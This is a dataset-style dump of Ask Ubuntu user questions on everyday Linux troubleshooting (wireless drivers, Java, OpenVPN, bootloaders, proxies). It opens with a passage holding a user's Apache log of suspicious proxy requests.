pub_url } http/1.0 '' 404 494 `` http : //www.salebusinessidea.com/index.php ? option=com_content & view=article & id=234 : what-is-a-sap-inventory-system ? -- & catid=119 & itemid=83 '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows 95 ; alexa toolbar ) '' 127.0.0.1:80 23.239.119.194 - - [ 01/feb/2014:00:49:43 +0000 ] `` get http : //ib.adnxs.com/ttj ? id=2106211 & referrer= % 5breferrer_url % 5d http/1.1 '' 404 438 `` http : //ask.com '' `` mozilla/4.0 ( compatible ; msie 5.5 ; windows nt ) '' 127.0.0.1:80 198.56.202.212 - - [ 01/feb/2014:00:49:43 +0000 ] `` get http : //ib.adnxs.com/ttj ? id=2168277 & position=above http/1.0 '' 404 494 `` http : //www.fulleducate.com/ ? p=633 '' `` mozilla/5.0 ( compatible ; msie 9.0 ; windows nt 6.1 ; win64 ; x64 ; trident/5.0 ; .net clr 3.5.30729 ; .net clr 3.0.30729 ; .net clr 2.0.50727 ; media center pc 6.0 ) '' 127.0.0.1:80 198.56.202.213 - - [ 01/feb/2014:00:49:43 +0000 ] `` get http : //ib.adnxs.com/ttj ? id=2168277 & position=above http/1.0 '' 404 494 `` http : //www.fulleducate.com/ ? p=209 '' `` mozilla/5.0 ( windows ; u ; windows nt 6.1 ; en-us ) applewebkit/533.19.4 ( khtml , like gecko ) version/5.0.2 safari/533.18.5 '' 127.0.0.1:80 198.98.104.241 - - [ 01/feb/2014:00:49:44 +0000 ] `` get http : //tags.h12-media.com/tags.js ? site=216e49346226002857e6bcd64223e7fc & type=728x90 http/1.0 '' 404 504 `` : //www.lookforwardhappiness.com/index.php ? view=article & catid=35 % 3ahealth-insurance & id=5102 % 3a2013-12-28-11-28-29 & format=pdf & option=com_content & itemid=54 '' `` mozilla/4.0 ( compatible ; msie 6.01 ; windows 98 ; alexa toolbar ) '' 127.0.0.1:80 173.234.41.37 - - [ 01/feb/2014:00:49:44 +0000 ] `` get http : //ad.smxchange.com/st ? ad_type=iframe & ad_size=160x600 & section=4848284 & pub_url= $ { pub_url } http/1.0 '' 404 497 `` http : //hotbizs.com/index.php ? option=com_content & view=section & id=19 & layout=blog & itemid=412 & limitstart=261 '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.0 ; alexa toolbar ) '' 127.0.0.1:80 198.200.42.8 - - [ 01/feb/2014:00:49:44 +0000 ] `` get http : //ib.adnxs.com/ttj ? id=2150922 http/1.0 '' 404 494 `` http : //www.autosoldbest.com/ ? p=33 '' `` mozilla/5.0 ( windows nt 5.1 ; u ; de ; rv:1.9.1.6 ) gecko/20091201 firefox/3.5.6 opera 11.00 '' 127.0.0.1:80 192.169.85.227 - - [ 01/feb/2014:00:49:44 +0000 ] `` get http : //ads.yahoo.com/st ? ad_type=pop & ad_size=0x0 & section=3914696 & banned_pop_types=28 & pop_times=1 & pop_frequency=0 & pub_url= $ { pub_url } http/1.0 '' 404 494 `` http : //www.eiaok.com/financial-affairs/reasons-why-you-want-to-start-a-business-financial-security.html '' `` opera/9.80 ( windows nt 5.1 ; u ; ru ) presto/2.7.39 version/11.00 '' 127.0.0.1:80 198.2.199.147 - - [ 01/feb/2014:00:49:44 +0000 ] `` get http : //ib.adnxs.com/ttj ? id=2059583 & position=above http/1.0 '' 404 494 `` http : //www.bodybecare.com/future-lady-fashion-institute-kerala-zardosi-painting-courses-cochin-kerala/ '' `` mozilla/4.0 ( compatible ; msie 7.0 ; windows nt 6.0 ; ypc 3.2.0 ; slcc1 ; .net clr 2.0.50727 ; .net clr 3.0.04506 ) '' 127.0.0.1:80 172.246.42.139 - - [ 01/feb/2014:00:49:44 +0000 ] `` get http : //ib.adnxs.com/ttj ? id=2198716 http/1.0 '' 404 494 `` http : //www.fulleducate.com/ ? p=612 '' `` mozilla/5.0 ( windows ; u ; windows nt 6.1 ; zh-cn ; rv:1.9.2.8 ) gecko/20100722 firefox/3.6.8 '' i suspect it 's some kind of attack ( ddos ) . have reinstalled apache and php but the problem keeps . until now bloqueiei many ips that appear in the log , but does not solve . someone save what i can do to solve the problem ? i 'm using : linux version 3.11.0-12-generic ( buildd @ allspice ) ( gcc version 4.8.1 ( ubuntu/linaro 4.8.1-10ubuntu7 ) ) # 19-ubuntu smp wed oct 9 16:20:46 utc 2013 server version : apache/2.4.6 ( ubuntu ) server built : dec 5 2013 18:32:22 my proccess : pid user pr ni virt res shr s % cpu % mem time+ command 1384 www-data 20 0 181m 1652 1084 s 0.3 0.3 0:01.28 apache2 1405 www-data 20 0 181m 1652 1084 s 0.3 0.3 0:01.24 apache2 1544 www-data 20 0 181m 1688 1080 s 0.3 0.3 0:01.34 apache2 1575 www-data 20 0 181m 1696 1088 s 0.3 0.3 0:01.30 apache2 1783 root 20 0 17796 1556 1004 r 0.3 0.3 0:00.08 top 1 root 20 0 26920 1500 588 s 0.0 0.3 0:01.45 init 2 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0.0 0.0 0:02.56 ksoftirqd/0 5 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kworker/0:0h 6 root 20 0 0 0 0 s 0.0 0.0 0:00.88 kworker/u2:0 7 root rt 0 0 0 0 s 0.0 0.0 0:00.00 migration/0 8 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcu_bh 9 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/0 10 root 20 0 0 0 0 s 0.0 0.0 0:07.99 rcu_sched 11 root 20 0 0 0 0 r 0.0 0.0 0:17.54 rcuos/0 12 root rt 0 0 0 0 s 0.0 0.0 0:00.04 watchdog/0 13 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 khelper 14 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kdevtmpfs 15 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 netns 16 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 writeback 17 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kintegrityd 18 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 bioset 19 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kworker/u3:0 20 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kblockd 21 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 ata_sff 22 root 20 0 0 0 0 s 0.0 0.0 0:00.00 khubd 23 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 md 24 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 devfreq_wq 25 root 20 0 0 0 0 s 0.0 0.0 0:01.06 kworker/0:1 26 root 20 0 0 0 0 s 0.0 0.0 0:00.00 khungtaskd 27 root 20 0 0 0 0 s 0.0 0.0 0:01.10 kswapd0 28 root 25 5 0 0 0 s 0.0 0.0 0:00.00 ksmd 29 root 20 0 0 0 0 s 0.0 0.0 0:00.00 fsnotify_mark 30 root 20 0 0 0 0 s 0.0 0.0 0:00.00 ecryptfs-kthrea 31 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 crypto 43 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kthrotld 44 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kworker/u2:1 45 root 20 0 0 0 0 s 0.0 0.0 0:00.00 scsi_eh_0 46 root 20 0 0 0 0 s 0.0 0.0 0:00.00 scsi_eh_1 66 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 deferwq 67 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 charger_manager 119 root 20 0 0 0 0 s 0.0 0.0 0:00.28 jbd2/vda-8 120 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 ext4-rsv-conver 121 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 ext4-unrsv-conv 299 root 20 0 17452 136 136 s 0.0 0.0 0:00.12 upstart-udev-br 308 root 20 0 42624 508 508 s 0.0 0.1 0:00.03 systemd-udevd 310 messageb 20 0 30508 496 304 s 0.0 0.1 0:00.16 dbus-daemon ps : i am newbie in terminal . edit : i noticed something . deleted the logs and they only reappeared when i restarted apache .
413682	wireless internet problems with macbook pro 11,1	i have xubuntu 13.10 installed on a late 2013 macbook pro . it has a broadcom wireless card : lspci -vvnn | grep 14e4 02:00.0 multimedia controller [ 0480 ] : broadcom corporation device [ 14e4:1570 ] subsystem : broadcom corporation device [ 14e4:1570 ] 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4360 802.11ac wireless network adapter [ 14e4:43a0 ] ( rev 03 ) i 'm running the latest broadcom driver from ubuntu : rsyring @ loftex : ~ $ dpkg -l | grep -i broadcom ii bcmwl-kernel-source 6.30.223.141+bdcom-0ubuntu1 amd64 broadcom 802.11 linux sta wireless driver source but , i 'm having wireless internet problems . running ping , i 'm showing significant packet loss , up to 100 % , and also sometimes showing `` errors '' in the ping statistics . i 've seen this same behavior on two different wireless networks . the wireless works fine when running osx . suggestions ?
413683	a strange account appear at login to ubuntu 12.04 ?	an account name student account appear at login , what is thes account and how to disable it . hint i disable guest at /etc/lightdm/lightdm.conf how to disable this account ?
413687	switching to java 7	i have both java-6-openjdk and java-7-openjdk installed on my machine . when i check the version , i get java version `` 1.6.0_27 '' . i want to run java 7 but do n't really know what all i have to change to accomplish the change . is it as simple as changing the link from /etc/alternatives/java - > /usr/lib/jvm/java-6-openjdk-amd64/jre/bin/java /etc/alternatives/java - > /usr/lib/jvm/java-7-openjdk-amd64/jre/bin/java ?
413688	battery show percentage ( and time if possible )	my battery has some broken cells making the battery drop from 60 % straight down to 30 % in a few seconds . this makes the estimated time remaining extremely unreliable for a full charge but the percentages are quite reliable . for low percentages the time is useful once again . so my search for a fix to show the percentage as well as the time yielded an gnome extension that does exactly that but since i 'm using unity that would n't work . does anyone know an similar extension for unity ? ?
413691	installing ubuntu on lenovo ideapad m5400	i tried to install ubuntu 12.04 and 13.10 on my laptop . i disabled security boot , i tried to install from usb and cd , but with 12.04 version , after selection of installation ( i tried no modeset ) only flashing on display and 13.10 version display me that : no default or ui configuration directive found ! please , help me . i buy this laptop for use it with ubuntu and i want go to windows .
413695	ubuntu how to setup multi dhcp server	if you have 2 nic ( network lan card ) each connected to different networks : = > eth0 : 192.168.1.0/24 = > eth1 : 192.168.2.0/24 i need the dhcp server to serve the different subnets ip leases ? how to check the leases ? can the two subnets ping each others ?
413696	dell xps l502x : multi card reader	i 'm running ubuntu 13.10 on my dell xps l502x . kernel : 3.11.0-15-generic arch : x86_64 i 'm not sure if this is a bug , so i 'm trying to get a solution by asking here . if i do n't boot my laptop with an sd card inserted , the sd-card-reader wo n't be detected . i have to run echo 1 > /sys/bus/pci/rescan as root every time i want to use the card reader . this problem is present since ubuntu 11.10 . any ideas for a workaround on this ? maybe an init-script ? if you need more information , just let me know . by the way : booting an older kernel does n't help . thank you : )
413697	wireless network card for cq50	i have a compaq presario cq50 laptop with windows vista installed running 12.04 on a partition . the partition is nearly full and i want to ditch windows and use the whole of the disk for 12.04 . the one problem holding me back is that there is no 12.04 driver for the wireless network card . 12.04 is using the installed windows driver to work the wireless network card . it seems my options are to find a wireless network card which will fit in the cq50 which uses a 12.04 driver or to use a plug-in usb wireless device which will work with 12.04 . can anyone recommend which is the best way to go and what wireless device to use for networking . best regards , ian b
413699	does ubuntu work on the 2013 dell xps 15 ( 9530 ) ?	what hardware components work , and what does n't work ?
413701	align kde widgets	is there a way to align kde widgets . right now it 's really hard to do it , almost impossible . as you can see in this screen shot the widgets do n't align nicely , and there does n't seem to be an option to make them , or have them snap to each other 's borders .
413702	how to improve graphics in virtual machine virtualbox ?	i am running ubuntu 13.10 saucy salamander 32bit with intel速 sandybridge mobile x86/mmx/sse2 . i have a virtual machine with xp using virtualbox with the following settings : i 've tried setting the memory value with a bigger value , but whenever i get the browser it will show something like the following : it is the same using ie . edits : first edit : it used to work normally a couple of months ago ( ca n't remember if it worked after upgrading from ubuntu 13.04 ) .
413705	openvpn connection refused ( code=111 )	i 'm trying to set up an openvpn server on my pc . i have followed the steps described here . my server configuration file looks like this : local 192.168.1.150 port 1194 dev tun ifconfig 10.8.0.1 10.8.0.2 secret static.key my client configurattion file looks like this : remote a.b.c.d # this is my public ip address , is that correct ? port 1194 dev tun ifconfig 10.8.0.2 10.8.0.1 secret static.key when i start my server and client , the client gives the following : fri jan 31 20:04:27 2014 openvpn 2.2.1 x86_64-linux-gnu [ ssl ] [ lzo2 ] [ epoll ] [ pkcs11 ] [ eurephia ] [ mh ] [ pf_inet6 ] [ ipv6 payload 20110424-2 ( 2.2rc2 ) ] built on feb 27 2013 fri jan 31 20:04:27 2014 note : openvpn 2.1 requires ' -- script-security 2 ' or higher to call user-defined scripts or executables fri jan 31 20:04:27 2014 warning : file 'static.key ' is group or others accessible fri jan 31 20:04:27 2014 static encrypt : cipher 'bf-cbc ' initialized with 128 bit key fri jan 31 20:04:27 2014 static encrypt : using 160 bit message hash 'sha1 ' for hmac authentication fri jan 31 20:04:27 2014 static decrypt : cipher 'bf-cbc ' initialized with 128 bit key fri jan 31 20:04:27 2014 static decrypt : using 160 bit message hash 'sha1 ' for hmac authentication fri jan 31 20:04:27 2014 socket buffers : r= [ 229376- > 131072 ] s= [ 229376- > 131072 ] fri jan 31 20:04:27 2014 tun/tap device tun0 opened fri jan 31 20:04:27 2014 tun/tap tx queue length set to 100 fri jan 31 20:04:27 2014 do_ifconfig , tt- > ipv6=0 , tt- > did_ifconfig_ipv6_setup=0 fri jan 31 20:04:27 2014 /sbin/ifconfig tun0 10.8.0.2 pointopoint 10.8.0.1 mtu 1500 fri jan 31 20:04:27 2014 data channel mtu parms [ l:1544 d:1450 ef:44 eb:4 et:0 el:0 ] fri jan 31 20:04:27 2014 local options hash ( ver=v4 ) : 'd3880969' fri jan 31 20:04:27 2014 expected remote options hash ( ver=v4 ) : 'c41bf3b8' fri jan 31 20:04:27 2014 udpv4 link local ( bound ) : [ undef ] fri jan 31 20:04:27 2014 udpv4 link remote : [ af_inet ] a.b.c.d:1194 fri jan 31 20:04:37 2014 read udpv4 [ econnrefused ] : connection refused ( code=111 ) i added a rule to my ufw to allow all incoming traffic to port 1194 . i also added a rule to my router 's firewall , to allow all incoming traffic to port 1194 . i use a static ip address 192.168.1.150 . i tried turning off both firewalls to see if that would make it work , but no results . is there any reason why my client ca n't connect to my server ? notice i connect to my public ip address , is this correct ? or should it be something else ? edit : log of the server ( verb 3 ) : fri jan 31 23:01:54 2014 openvpn 2.2.1 x86_64-linux-gnu [ ssl ] [ lzo2 ] [ epoll ] [ pkcs11 ] [ eurephia ] [ mh ] [ pf_inet6 ] [ ipv6 payload 20110424-2 ( 2.2rc2 ) ] built on feb 27 2013 fri jan 31 23:01:54 2014 warning : you are using user/group/chroot/setcon without persist-tun -- this may cause restarts to fail fri jan 31 23:01:54 2014 warning : you are using user/group/chroot/setcon without persist-key -- this may cause restarts to fail fri jan 31 23:01:54 2014 note : openvpn 2.1 requires ' -- script-security 2 ' or higher to call user-defined scripts or executables fri jan 31 23:01:54 2014 static encrypt : cipher 'bf-cbc ' initialized with 128 bit key fri jan 31 23:01:54 2014 static encrypt : using 160 bit message hash 'sha1 ' for hmac authentication fri jan 31 23:01:54 2014 static decrypt : cipher 'bf-cbc ' initialized with 128 bit key fri jan 31 23:01:54 2014 static decrypt : using 160 bit message hash 'sha1 ' for hmac authentication fri jan 31 23:01:54 2014 socket buffers : r= [ 229376- > 131072 ] s= [ 229376- > 131072 ] fri jan 31 23:01:54 2014 tun/tap device tun0 opened fri jan 31 23:01:54 2014 tun/tap tx queue length set to 100 fri jan 31 23:01:54 2014 do_ifconfig , tt- > ipv6=0 , tt- > did_ifconfig_ipv6_setup=0 fri jan 31 23:01:54 2014 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500 fri jan 31 23:01:54 2014 data channel mtu parms [ l:1544 d:1450 ef:44 eb:4 et:0 el:0 ] fri jan 31 23:01:54 2014 local options hash ( ver=v4 ) : 'c41bf3b8' fri jan 31 23:01:54 2014 expected remote options hash ( ver=v4 ) : 'd3880969' fri jan 31 23:01:54 2014 gid set to neftas fri jan 31 23:01:54 2014 uid set to neftas fri jan 31 23:01:54 2014 udpv4 link local ( bound ) : [ af_inet ] 192.168.1.150:1194 fri jan 31 23:01:54 2014 udpv4 link remote : [ undef ]
413706	ubuntu low graphics mode	after one of the last updates , when i turn on my eeepc with ubuntu 12.04 , i see an error message saying that the system is in low graphics mode , and the offers me a series of options , but whatever i choose the prompt simply closes and nothing more happens . how could i go fixing this problem if i am currently unable to reach the desktop ? is there some command line tool that can help me fix this ?
413708	loading cpu 100 % and hdd activity always on non-stop , when installing new a few font type	i have just install new a few fonts in ubuntu 13.10 with the reason for improving compatible font with microsoft windows , microsoft office and other windows app , especially for app and other software like libreoffice , read curricullum online learning , etc . i recently installed few fonts , my laptop can not responding , hanging or freezing that memory can not accomodate capacity . so , i kill my system to force shutdown by press and hold power button . because i think feature especially like embedded font in libreoffice , content apps and other apps do n't fully work properly than after install new fonts even better . i think it was strange font , when i read many contents . by the way , i just got the copy all format type .ttf fonts from windows 7 . anyone can solve the problem ? thanks .
413709	why does my hostname contain odd characters ?	i installed ubuntu , went straight to the terminal and noticed there is some odd characters in my name . here 's what it is : imageek @ imageek-dp700a3d-dm700a3d-db701a3d-dp700a7d : how do i change this ?
413710	nc : proxy error : `` http/1.0 403 forbidden ''	i am using ubuntu 13.10 x86_64 . i am not able to ssh over proxy to remote host . when i issued : ssh -vl hackep6t 162.251.80.25 i got this output : openssh_6.2p2 ubuntu-6ubuntu0.1 , openssl 1.0.1e 11 feb 2013 debug1 : reading configuration data /home/rootkea/.ssh/config debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : executing proxy command : exec nc -x connect -x 192.168.5.254:3128 162.251.80.25 22 debug1 : permanently_drop_suid : 1000 debug1 : identity file /home/rootkea/.ssh/id_rsa type -1 debug1 : identity file /home/rootkea/.ssh/id_rsa-cert type -1 debug1 : identity file /home/rootkea/.ssh/id_dsa type 2 debug1 : checking blacklist file /usr/share/ssh/blacklist.dsa-1024 debug1 : checking blacklist file /etc/ssh/blacklist.dsa-1024 debug1 : identity file /home/rootkea/.ssh/id_dsa-cert type -1 debug1 : identity file /home/rootkea/.ssh/id_ecdsa type -1 debug1 : identity file /home/rootkea/.ssh/id_ecdsa-cert type -1 debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.2p2 ubuntu-6ubuntu0.1 nc : proxy error : `` http/1.0 403 forbidden '' ssh_exchange_identification : connection closed by remote host please help .
413711	system wide proxy in lubuntu ?	is there an easy way ( preferably gui ) to set system wide proxy in lubuntu ? there are some answers but they are difficult and they need many terminal commands to run .
413713	getting compiz back after removing	i installed spss on 12.04 , there was some graphic problem , the screen turned blank . so , i tried to improve by removing compiz . now i want to get it back . but the sofware center wont install it as it says that `` there isn’t a software package called “compiz-core” in your current software sources . '' what should i do ? : /
413718	is there any way to save files when switching to a different version of ubuntu ?	is there any way of saving all the apps that i have downloaded and files in my home folder when switching versions of ubuntu ? i want to upgrade from 12.04 to 13.10 but do n't want to lose all of the applications that i have downloaded or the files that have been collected over a period of time . it will take a lot of time and bandwidth if i have to download everything over again . thanks !
413723	efi disk error when booting	when i power on my laptop it goes to a black screen with the message efi disk error efi disk error efi disk error then it loads grub and i can dual boot ubuntu/windows 8 perfectly fine . should i be concerned about this error because both os 's have been working as always without any issues .
413725	best practice , upgrading 13.10 to 14.04 , 13.10 on encrypted lvm entire drive ?	options : backup personal data , wipe drive , fresh install , restore data . use the upgrade tool . i do use ppas , but not xorg-edgers or anything kernel related . i would just use the fresh install from a usb stick but reuse existing home directory option in the ubuntu installer , but i do n't think that works with a drive that 's wholly encrypted . i could be wrong ( and hopefully am : ) ) . i am planning on upgrading after 14.04 is released , not during the alpah/beta/rc stage . : ) thoughts/suggestions/new information ?
413726	installing ubuntu on usb and not hdd ... how ?	this is my first time ever doing this . i have ubuntu on my usb . i can boot from my usb . when it asks to install , is it wanting to install on the usb or hdd ? right now it says there 's no detected os on this computer . ( i do have win 8.1 ) what 's it asking to install on ? is it possible to install ubuntu on my usb rather than using the `` try '' feature so it does n't install on my hdd ? do i select my usb for boot loader installation ?
413729	windows 8 does not boot	i have a samsung laptop with preinstalled windows 8 . today i tried to install ubuntu 13 . 04 . i chose the option `` install ubuntu alongside windows 8 '' and it worked well . after finishing the installation i restarted the computer . in the grub menu i chose the windows 8 entry but i just got an error : command > > drivemap < < was not found invalid efi file path when i tried start the windows recovery i have the same error . so i went back to ubuntu and updated grub but it did not . can anyone me to get my windows working again ?
413730	external monitor has very washed out colors , blacks look almost gray	i have a macbookpro ( late 2013 retina model - 11,1 ) running xubuntu 13.10 . i have the main laptop monitor and two asus vs238h monitors . one connected by dvi and another by hdmi . currently , one external monitor has very washed out colors , the blacks almost look gray . i have used different cables and can make the washed out colors appear on the alternate external monitor by switching the hdmi cable from the second monitor to the first . therefore , it seems to me that this color difference is something caused by the software and not the cables or monitors themselves . i 've looked at xrandr settings ( gamma and brightness ) but that does n't get the monitors to look the same . suggestions ?
413731	windows xp dual-boot ( wubi install ) stopped working for ubuntu - gives `` missing or corrupt system32\hal.dll '' error	this was working fine for a year or three - something happened in the last month or so . i 'm pretty sure that the missing hal.dll file is n't the actual problem - the file is there , and windows works fine . ( i found out the hard way that windows does n't work without it ( ! ? ! ) , but that 's another story . ) i 've looked at the boot.ini file , but i do n't see anything obvious ( to me ) wrong with it . it looks almost identical to the example in this thread . i 'll try to post mine later today . i ca n't think what might have changed . i vaguely recall an ubuntu update the last time i was using it - could that be an issue ?
413732	what is clipboard buffer in linux	i have just started learning linux internals and modules . i have a doubt , when we copy text or select text where is the text stored ? in other words , which variable/buffer stores it ?
413740	can not get 12.10 to update	preconfiguring packages ... dpkg : error : parsing file '/var/lib/dpkg/status ' near line 26698 package 'gimp-plugin-registry ' : blank line in value of field 'description' e : sub-process /usr/bin/dpkg returned an error code ( 2 )
413741	libreoffice 4.1 failing - ubuntu 13.10	the menus in libreoffice 4.1 have stopped working properly . they still drop down when i hover over them , yet only a few of the options are available - none of them that i need , such as formatting options .
413743	how to directly download a source package installation package tarball from a url ?	this is my first question . quick background : i am an undergrad doing a bioinformatics class in which we use linux . i have minimal background in linux and i am having an issue with one of the problems for my homework . as the title says , i need a `` single command '' that i can use to download a source package from the package 's url in my working directory . i have searched everywhere and i ca n't find anything . if it helps , i have to do a non-root install on a class server . package i am trying to download : http : //www.tree-puzzle.de/ # download
413744	how can i install ubuntu-restricted-extras without having to confirm the ttf-mscorefonts-installer licenses manually ?	whenever i do a fresh install of ubuntu , i have a whole lot of programs i install and remove by using a few big apt-get commands . i use the -- assume-yes flag so i do n't have to confirm the installation and removal of these packages after apt-get has calculated the total installation changes . for instance : sudo apt-get install hedgewars mousepad gimp synapse -- assume-yes & & sudo apt-get remove gedit -- assume-yes this works fine , except for the package ubuntu-restricted-extras : even with the -- assume-yes flag passed , the installation process waits for me to manually confirm the licence agreements . i find this a hassle , and i 'd much rather confirm these agreements beforehand by passing a flag or changing the command in another way . how can i get this done ? these are the screens that show up when trying to install ubuntu-restricted-extras :
413746	why does suffixing an ampersand at the end of a gtk command , result in extra output in the next command after close ?	for example : $ cd ~/code/somefolder ~/code/somefolder $ gitk -- all & # launches a gtk window of gitk [ 1 ] 9335 # what is this in the first place now i go do some work inside the gtk window , then close it ~/code/somefolder $ echo 'foobar' foobar [ 1 ] + done gitk -- all # this extra output i have an inkling that the ampersand is somehow 'holding ' the process and closing it in gtk ends the process resulting in the output ... but that 's a very unscientific explanation . ps : sorry about the unwieldy question , i could n't think of a better way to express it .
413749	how to download any file from terminal in ubuntu 13.10	i wander if there is any way to download any type of file ( videos , pdf , ... .. etc ) by typing a terminal command or if there is any free download manager like idm in windows using ubuntu 13.10
413753	bad sectors `` disconnects '' the hdd	after a while using a netbook , the hdd fails and mounts into read only . after you reboot , the hdd check begins and the disk can be used again ( until randomly happens again ) theres a sound in the disk when the fail takes place . i tried hdd re-generator , and in every mode happens the same : when reaching the bad sectors , a message pops asking to turn on the disk , and to go into bios and put the sata into ide something compatibility , which i can not do cause i do n't know the bios password . the netbook has a rom chip with the bios data and it can not be flashed or acked unless you put it into a pic decrypt , which i ca n't or wo n't do . i wanted to try bad-blocks and forcing it to mount , but when i try to go into my lubuntu session , it wo n't mount the /home disk , and alt + f2 does n't give me a console prompt , when logging , a black console message appears and it wo n't log in . i have a live lubuntu , i was thinking about formatting the home directory again ( nothing important actually ) and isolate the bad sectors . problem is : if the problem persists . what can i do , and how do i do it ?
413754	d-link dwa-160 a2 driver for ubuntu 13.10 ?	i have tried to install the d-link dwa-160 a2 driver that came out in 2008 , but it did n't succeed . is there any newer drivers that is compatible with ubuntu 13.10 , or any other ways to install it ?
413758	how to custumize ubuntu 12.04 after installing nvida driver ?	i installed ubuntu 12.04 and install myunity tool . i was able to customize the interface but after i installed the nvidia driver a lot of changes to the interface happens . some changes are good when it comes to the quality of icons but other things went too ugly ( example : the workspace switcher popup `` ctrl+alt+up/down '' ) . now i want to either be able to customize the interface with myunity or similar tools because it 's giving me this message `` your ubuntu 12.04 is running in 2d mode . many features will not be available '' or i want to get back my default graphic card `` nouveau '' .
413761	half gnome half unity 13.10	after i installed gnome-shell , the unity desktop is half gnome.. i removed the gnome , but the problem exist . i tried to reset unity , also tried to reinstall unity and nothing helps.. - the screen of my problem :
413762	qt creator can not run html5 apps on ubuntu 13.10 , is it broken ?	when attempting the ubuntu html5 tutorial on the ubuntu site , i have just created the template app and am attempting to run it . when i run it , i get this error : starting ubuntu-html5-app-launcher -- www=/home/shah/code/qrcode-scanner /usr/bin/ubuntu-html5-app-launcher : error while loading shared libraries : libqt5core.so.5 : can not open shared object file : no such file or directory ubuntu-html5-app-launcher exited with code 127 i am not sure how to resolve this and i can not find any threads with fixes regarding this problem . i have tried a sudo apt-cache search libqt5core which indicates libqt5core5 but i already have that installed , so i 'm wondering if something else is wrong .
413764	grub rescue - no such device found	i was trying to install ubuntu on my external hard using a usb . after the installation completed and it restarted it started showing a message error : no such device : 0dd88aed-3b49-45d7-308a0ca22934 grub rescue > i searched through the internet and when i reboot it again from the usb it gives the following problems : on trying ubuntu it gives a problem for low graphics and prints something like not finding ext2 sort of stuff on installing it gives an error for ext 4 creation failed please help.. i do n't want to lose my data on my hdd .
413768	beginner question : eclipse ( kepler ) for ubuntu 12.04 - error messages with install	i just installed eclipse kepler with ubuntu 12.04 , and i am having some weird problems with it . screengrab here my thoughts are that i probably screwed up something when installing java ? as a sidenote , i am a beginner with ubuntu/linux , so this might be a completely solvable problem .
413773	java problem ( minecraft )	my minecraft is doing strange things since i updated a few things in ubuntu 13.10 a few hours ago . the update included a kernel update . kernel is now 3.11.0-15-generic x86_64 . before that update my minecraft ran fine . i 'm starting minecraft with bumblebee via the optirun command . so now my minecraft launcher starts normal , but when i hit the `` play '' button , a new window opens , the launcher disapperas , then the launcher reapears and the new window closes in the same moment . my minecraftlauncher devlog says . when i select another version in the launcher , it is the same problem . my guess is , that the new kernel version has a problem with java , but just a guess : ) maybe a reinstallation of java could help , i installed java this this installation guide but i do n't know how to do that ; ) looking forward to your help , leander
413775	open ports in ubuntu 13.10	ubuntu comes with no open ports . mine is a fresh install with only skype xbmc and wine added . i installed gufw and set it to on . when i do sudo netstat -tulpn | grep listen i got : tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 610/cupsd tcp 0 0 0.0.0.0:25 0.0.0.0 : * listen 27832/master tcp 0 0 127.0.1.1:53 0.0.0.0 : * listen 1201/dnsmasq tcp6 0 0 : :1:631 : : : * listen 610/cupsd tcp6 0 0 : ::25 : : : * listen 27832/master is this normal ? should i worry ? any and every answer is appreciated .
413778	how to remove duplicate entries within the open with other application menu ?	whenever i try to open a file with an application , i found different than default programs duplicated entries : how to remove duplicated entries ?
413783	can i get the launcher to `` re see '' open processes ?	i 've got about 8 gnome-terminal tabs open in one window . for some reason , the launcher is not aware of this window suddenly . when i click on the gnome-terminal symbol in launcher , it wo n't slide the existing windows into view ( or bring them to front ) it will just open a new gnome-terminal . yesterday it was working fine , clicking the `` lit up '' gnome-terminal symbol in the launcher would slide me to the correct workspace ( if needed ) and bring gnome-terminal to front . same thing is happening with google chrome 32 . it does n't seem to be aware of open windows . is this a bug or some setting that i 'm not aware of ( that i managed to change anyway ) ? gnu bash , version 4.2.25 ( 1 ) -release ( x86_64-pc-linux-gnu ) ubuntu : no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise the natural solution is to just kill the gnome-terminal but i 'd prefer not to , there 's things running in there that i 'd rather not kill .
413787	dual boot windows 8.1 wifi is n't working properly on ubuntu 13.10	i recently installed a ubuntu 13.10 dual boot on my asus ux32vd with windows 8.1 . everything in ubuntu works perfectly , except for the wifi . it can connect to the network initially , and it says that it stays connected , but the connection drops after about 30 seconds . my computer has a centrino advanced-n 6235 wireless card , and wifi works perfectly when i run windows . i have very low experience with unix and the terminal , so i have not tried anything in the terminal . any suggestions ?
413790	where can i find a complete list of all ubuntu releases and life terms ?	i am running lubuntu and it does not have lts releases , so i want to know if my version is eol or not and what versions are . i know of the releases page on the wiki , but that only covers ubuntu , not any of the distros of ubuntu , such as lubuntu , xubuntu , kubuntu , etc . i also know of the ubuntu-release-status command , and that is useful , but could be a bit confusing for new users and is n't easy to understand . are there any pages that has a list of all the distros and their life terms , or a page per-distro separate from the ubuntu wiki page ?
